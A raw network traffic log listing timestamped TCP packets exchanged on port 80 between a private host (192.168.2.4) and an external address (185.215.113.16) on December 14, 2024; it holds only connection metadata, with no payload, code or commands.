Dec 14, 2024 12:56:35.585418940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.585465908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.585678101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.586565018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.586664915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.586709023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.586890936 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.587713003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.587759018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.587876081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.587918997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.588892937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.588953018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.589025974 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.589065075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.590003967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.590066910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.590148926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.590274096 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.591178894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.591290951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.591339111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.592391968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.592454910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.592503071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.592556000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.593553066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.593669891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.593713999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.594832897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.594878912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.594899893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.594939947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.595918894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.595944881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.595963001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.595993996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.597084999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.597129107 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.597229958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.597295046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.598256111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.598309040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.598371029 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.598532915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.599420071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.599482059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.599519968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.599560976 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.600614071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.600665092 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.600740910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.600786924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.601807117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.601850986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.602003098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.602045059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.602996111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.603152037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.603197098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.604146957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.604278088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.604327917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.605304003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.605389118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.605412006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.605460882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.606518984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.606616020 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.606661081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.606879950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.607670069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.607712030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.607804060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.608139992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.608838081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.608884096 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.608957052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.609014988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.610155106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.610198975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.610222101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.610266924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.611207962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.611262083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.611355066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.611399889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.612370968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.612421989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.612535000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.612699032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.613549948 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.613596916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.613778114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.613823891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.614725113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.614794970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.614839077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.615580082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.615842104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.615993977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.746531963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.746556997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.746611118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.747047901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.747164965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.747217894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.747898102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.748006105 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.748054028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.748953104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.749005079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.749052048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.749109030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.750139952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.750200987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.750246048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.750288010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.751354933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.751409054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.751415014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.751611948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.752504110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.752557993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.752597094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.752652884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.753663063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.753810883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.753859043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.754889965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.754964113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.756001949 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.756057024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.756083965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.756403923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.757220984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.757263899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.757308960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.757349014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.758431911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.758483887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.758528948 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.758605003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.759536982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.759598017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.759682894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.759764910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.760725975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.760787010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.760844946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.760885954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.761940956 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.761997938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.762073040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.762119055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.763120890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.763175964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.763215065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.763411999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.764264107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.764447927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.764498949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.765414953 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.765460014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.765528917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.765568972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.766650915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.766746044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.766896963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.767806053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.767862082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.767932892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.767981052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.768992901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.769049883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.769118071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.769157887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.770152092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.770211935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.770351887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.770391941 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.771357059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.771410942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.771441936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.771606922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.772526026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.772578955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.772720098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.772762060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.773674965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.773730040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.773822069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.773863077 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.774854898 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.774974108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.775032997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.776045084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.776149035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.776202917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.777224064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.777267933 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.777350903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.777395964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.778409004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.778464079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.778636932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.779556990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.779613018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.779659033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.780734062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.780807972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.780838013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.781672001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.781917095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.782068014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.782120943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.783113003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.783206940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.783252954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.784293890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.784374952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.784408092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.785439968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.785500050 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.785562992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.786427975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.786642075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.786694050 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.786725998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.786768913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.787810087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.787913084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.788248062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.788995028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.789088011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.789144039 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.790163994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.790208101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.790252924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.790658951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.791341066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.791454077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.791507959 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.792498112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.792607069 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.792642117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.792702913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.793694019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.793803930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.794864893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.794914961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.795082092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.796058893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.796106100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.796153069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.797219992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.797265053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.797378063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.798449993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.798497915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.798526049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.799474955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.799741983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.799848080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.799860954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.799897909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.801074028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.801146030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.801215887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.801256895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.802128077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.802274942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.802408934 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.802453041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.803359032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.803463936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.804344893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.804411888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.804449081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.805269957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.805438042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.805596113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.805650949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.806668043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.806724072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.806814909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.806859016 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.807909012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.807962894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.938669920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.938775063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.938791037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.938889027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.939141989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.939228058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.939275026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.940069914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.940185070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.940231085 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.941226006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.941330910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.941375017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.942419052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.942542076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.942604065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.943623066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.943722010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.944771051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.944827080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.944864035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.945930958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.945983887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.946054935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.946588039 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.947117090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.947166920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.947213888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.947684050 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.948292017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.948436022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.948474884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.948673964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.949462891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.949512005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.949603081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.949709892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.950650930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.950751066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.950804949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.951843977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.951957941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.952775955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.953202009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.953254938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.953299046 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.953345060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.954186916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.954253912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:35.954328060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:35.954376936 CET	49827	80	192.168.2.4	185.215.113.16
